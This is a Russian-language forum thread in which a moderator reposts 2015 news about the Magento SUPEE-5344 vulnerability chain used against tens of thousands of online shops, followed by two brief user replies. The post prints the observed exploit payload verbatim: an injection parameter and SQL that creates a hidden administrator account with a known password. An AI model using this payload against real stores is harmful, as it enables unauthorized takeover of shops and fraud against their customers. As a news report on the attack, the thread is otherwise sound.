1. Внимание! Пользователи форума Null-Prog.ru, сейчас на сайте идёт полное реорганизация. По просьбам большинства, постепенно вводится внутренняя валюта сайта для покупки VIP контента ПОШТУЧНО! В связи с чем ближайшие 4 дня могут быть перебои в работе, недоступность (кратковременная) сайта. Если сейчас УЖЕ вам нужен какой либо контент, обращаемся в личку. Все, купившие VIP ранее, сохраняют свой статус и их эти новшества никак не затрагивают. Касательно использования валюты, будет мануал позже. Спасибо за понимание. 

    Скрыть объявление
  2. На нашем форуме Null-Prog действует серьёзное правило касательно размещения материалов!

    ДЛЯ РЕЛИЗЁРОВ: категорически запрещается выкладка материалов на файлообменники типа Deposit, letitbit и другие, требующие просмотров рекламы, обрезающие скорость и тд. Нарушителям, первые 2 раза предупреждения, далее БАН. Тему по этому поводу можно посмотреть ТУТ

    Скрыть объявление
  3. В тестовом режиме на нашем форуме открыт онлайн конструктор сайтов. Вы можете попробовать создать свой сайт у НАС, интуитивно понятный интерфейс, переведёт на 95%, быстрый экспорт проекта, от вас только перетаскивать элементы и вставить в них необходимый текст!

    Все вопросы ТУТ

    Скрыть объявление

  4. Скрыть объявление
  5. Уважаемые форумчане, открывается новый раздел форума, посвящённый ремонту и эксплуатации автомобилей. Просмотреть его можно ТУТ

    Так как раздел новый, информация будет пополнять каждый день. Если есть какие либо замечания по этому разделу, отписываемся в соответствующий раздел форума, либо в личку.

    Напоминаю, сообщения в разделе АВТО не учитываются, общение не ограничено.

    Скрыть объявление
  6. Объявляется набор Модераторов на различные раздел форума, свои заявки можно оставлять в ЭТОМ разделе, перед оставлением заявки рекомендуется ознакомиться с ПРАВИЛАМИ для модераторов.

Важно Уязвимость в CMS Magento: пострадали 98 000 интернет-магазинов

Тема в разделе "Обсуждение новостей", создана пользователем Sam Jack, 7 май 2015.

  1. Sam Jack

    Sam Jack Капитан-Узурпатор
    Команда форума Созидатель

    Регистрация:
    5 май 2015
    Сообщения:
    12.037
    Симпатии:
    2.466
    [​IMG]
    Злоумышленники уже начали эксплуатировать исключительно опасную уязвимость SUPEE-5344, которая присутствует почти в 100 000 интернет-магазинах, работающих на системе управления контентом Magento.

    Magento считается самой популярной CMS для интернет-магазинов. Разработчики выпустили патчещё в феврале, но до сих пор большое количество торговых площадок не установили его, как это часто бывает. Многие владельцы магазинов просто не знают, что подвергают опасности и себя, и своих пользователей.

    О проблеме рассказал голландский хостер Byte, который размещает много сайтов на платформе Magento. Они уже наблюдали использование эксплоита для Magento версий Community и Enterprise.

    Информацию подтверждают коллеги из Sucuri. Они говорят, что обнаруженный ими эксплоит осуществляет только одну функцию: создаёт фальшивый админский аккаунт в базе данных Magento.

    popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

    SET @SALT = “rp”;

    SET @PASS = CONCAT(MD5(CONCAT( @SALT , ‘123’) ), CONCAT(‘:’, @SALT ));
    SELECT @@EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

    INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (‘Firstname’,’Lastname’,”email@example.com”,’ypwq‘,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

    INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,’U’,(SELECT user_id FROM admin_user WHERE username = ‘ypwq’),’Firstname’); –


    «Уязвимость на самом деле состоит из цепочки нескольких уязвимостей, которые в итоге позволяют неавторизованному пользователю запустить PHP-код на сервере», — объясняетНетанель Рубин (Netanel Rubin) из компании Check Point. В частности, используются уязвимости CVE-2015-1397, CVE-2015-1398 и CVE-2015-1399. На сопровождающем видео специалисты Check Point показывают, как заказать дорогие наручные часы, используя SUPEE-5344.

    По информации Incapsula, атаки начались в понедельник с IP-адресов 62.76.177.179 и 185.22.232.218 (оба российские).
     
    Метки:
  2. torrok

    torrok Новичок

    Регистрация:
    22 сен 2015
    Сообщения:
    17
    Симпатии:
    1
    Интересно уже исправили. слишком уж навороченный это Magento
     
  3. emosko

    emosko Новичок

    Регистрация:
    4 ноя 2015
    Сообщения:
    26
    Симпатии:
    3
    хорошо что я передумал ставить на него магаз. опенкарт рулит. хотя наверное весь в дырах
     

Поделиться этой страницей

iHax Community
Рейтинг@Mail.ru Яндекс.Метрика мониторинг сайтов
Форум программного обеспечения/
Загрузка...